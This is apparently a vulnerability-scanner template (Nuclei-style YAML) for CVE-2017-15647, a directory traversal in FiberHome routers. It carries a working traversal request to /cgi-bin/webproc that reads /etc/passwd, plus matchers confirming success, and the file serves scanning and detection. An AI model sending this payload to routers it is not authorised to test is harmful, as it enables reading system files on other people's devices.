28 lines
701 B
YAML
28 lines
701 B
YAML
id: CVE-2017-15647
|
|
|
|
info:
|
|
name: FiberHome - Directory Traversal
|
|
author: daffainfo
|
|
severity: medium
|
|
description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
|
|
reference: |
|
|
- https://www.exploit-db.com/exploits/44054
|
|
- https://www.cvedetails.com/cve/CVE-2017-15647
|
|
tags: cve,cve2017,lfi,router
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|